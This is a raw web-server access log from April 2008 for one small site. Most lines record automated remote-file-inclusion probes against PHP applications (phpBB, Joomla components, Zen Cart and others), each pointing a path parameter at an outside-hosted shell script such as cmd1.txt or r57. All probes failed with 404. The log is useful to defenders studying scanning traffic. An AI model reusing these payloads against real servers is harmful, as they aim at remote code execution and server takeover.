87.106.65.116 - - [01/Apr/2008:05:46:20 -0700] "GET /logs/access_080218.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:05:46:20 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:05:46:21 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:46:31 -0700] "GET /logs/access_080119.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:46:34 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.51.161 - - [01/Apr/2008:05:46:35 -0700] "GET /minamijewelry/flower.psd HTTP/1.0" 200 109558 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:47:32 -0700] "GET /logs/access_080124.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:47:34 -0700] "GET /logs/access_080218.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:48:04 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.51.233 - - [01/Apr/2008:05:48:05 -0700] "GET /minamijewelry/dream.psd HTTP/1.0" 200 109304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:05:48:06 -0700] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:48:07 -0700] "GET /logs/access_080118.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.244.77 - - [01/Apr/2008:05:48:37 -0700] "GET /logs/access.log/products.php?prod=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.244.77 - - [01/Apr/2008:05:48:38 -0700] "GET /products.php?prod=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.244.77 - - [01/Apr/2008:05:48:39 -0700] "GET /logs/products.php?prod=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.89 - - [01/Apr/2008:05:49:08 -0700] "GET /bikes/dteel/2008_02_16/?N=D HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:49:16 -0700] "GET /logs/access_080219.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.9.186 - - [01/Apr/2008:05:50:02 -0700] "GET /retreat1/webcam/?M=A HTTP/1.0" 200 720630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.94.1.95 - - [01/Apr/2008:05:50:12 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cms-medien.org/include/inc_ext/rsswriter/cmd3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.94.1.95 - - [01/Apr/2008:05:50:12 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cms-medien.org/include/inc_ext/rsswriter/cmd3.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
67.195.44.102 - - [01/Apr/2008:05:51:06 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:51:20 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:05:51:49 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:05:51:49 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:05:51:50 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:05:51:55 -0700] "GET /logs/access_080212.log//phplivehelper/initiate.php?abs_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.31.119 - - [01/Apr/2008:05:52:03 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/ HTTP/1.0" 200 8427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:52:30 -0700] "GET /logs/access_080313.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.198.83.196 - - [01/Apr/2008:05:53:09 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/h4_dy/lek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.198.83.196 - - [01/Apr/2008:05:53:09 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/h4_dy/lek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:53:15 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:05:53:41 -0700] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:05:53:46 -0700] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:54:05 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:54:27 -0700] "GET /logs/access_080119.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:54:30 -0700] "GET /logs/access_080305.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:54:38 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.198.83.196 - - [01/Apr/2008:05:54:41 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/h4_dy/lek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:54:42 -0700] "GET /logs/access_080119.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:05:55:08 -0700] "GET /logs/access_080313.log/index1.php?x=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:05:55:08 -0700] "GET /logs/access_080313.log/index1.php?x=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:05:55:08 -0700] "GET /index1.php?x=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:05:55:08 -0700] "GET /index1.php?x=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:55:08 -0700] "GET /logs/access_080213.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:05:55:16 -0700] "GET /logs/access_080306.log/index1.php?x=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:05:55:16 -0700] "GET /logs/access_080306.log/index1.php?x=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:55:32 -0700] "GET /logs/access_080118.log//modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:55:36 -0700] "GET //modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:55:40 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:05:55:57 -0700] "GET /logs/access_080218.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:05:55:59 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [01/Apr/2008:05:56:12 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:05:56:55 -0700] "GET /logs/access_080306.log/index1.php?x=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:05:56:55 -0700] "GET /logs/access_080306.log/index1.php?x=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:05:57:46 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:05:57:47 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
74.6.8.35 - - [01/Apr/2008:05:57:50 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/?N=D HTTP/1.0" 200 8427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:58:25 -0700] "GET /logs/access_080119.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.47.60.169 - - [01/Apr/2008:05:58:48 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.47.60.169 - - [01/Apr/2008:05:58:49 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.47.60.169 - - [01/Apr/2008:05:58:50 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:05:58:58 -0700] "GET /logs/access_080219.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.51.185 - - [01/Apr/2008:05:59:07 -0700] "GET /minamijewelry/html/ HTTP/1.0" 200 13287 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.159.200.63 - - [01/Apr/2008:05:59:09 -0700] "GET /logs/ HTTP/1.1" 200 41264 "-" "libwww-perl/5.805" "dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:59:41 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:59:48 -0700] "GET /logs/access_080119.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:05:59:51 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.27.49 - - [01/Apr/2008:06:00:30 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/?D=A HTTP/1.0" 200 8427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.122.47.228 - - [01/Apr/2008:06:00:48 -0700] "GET /logs/access_080104.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.52.31 - - [01/Apr/2008:06:00:55 -0700] "GET /minamijewelry/?D=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:06:01:47 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:06:01:47 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:01:57 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:06:01:59 -0700] "GET /index1.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:02:00 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:02:02 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:02:02 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
195.14.47.251 - - [01/Apr/2008:06:02:04 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:06:02:13 -0700] "GET /index1.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:06:02:15 -0700] "GET /index1.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:06:03:26 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:06:03:26 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.14.47.251 - - [01/Apr/2008:06:03:55 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.14.47.251 - - [01/Apr/2008:06:03:56 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.14.47.251 - - [01/Apr/2008:06:03:56 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:06:04:29 -0700] "GET /logs/access_080313.log/index1.php?x=http://www.xdengue.xpg.com.br/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:06:04:29 -0700] "GET /index1.php?x=http://www.xdengue.xpg.com.br/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:06:04:30 -0700] "GET /logs/index1.php?x=http://www.xdengue.xpg.com.br/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:06:04:32 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:06:04:34 -0700] "GET /logs/access_080306.log/index1.php?x=http://www.xdengue.xpg.com.br/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:06:04:50 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:06:04:50 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:06:05:01 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:06:05:02 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:06:05:02 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:05:12 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:05:17 -0700] "GET /logs/access_080119.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:06:05:23 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.14.47.251 - - [01/Apr/2008:06:05:32 -0700] "GET /common/db.php?commonpath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:06:05:58 -0700] "GET /logs/access_080306.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:06:05:59 -0700] "GET /logs//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.66.99.150 - - [01/Apr/2008:06:06:15 -0700] "GET /logs//modifyform.html?code=http://www.indicce.com/admin/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:06:06:20 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:06:36 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:06:38 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
118.127.2.108 - - [01/Apr/2008:06:06:44 -0700] "GET //config/dbutil.bck.php?confdir=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
118.127.2.108 - - [01/Apr/2008:06:06:44 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
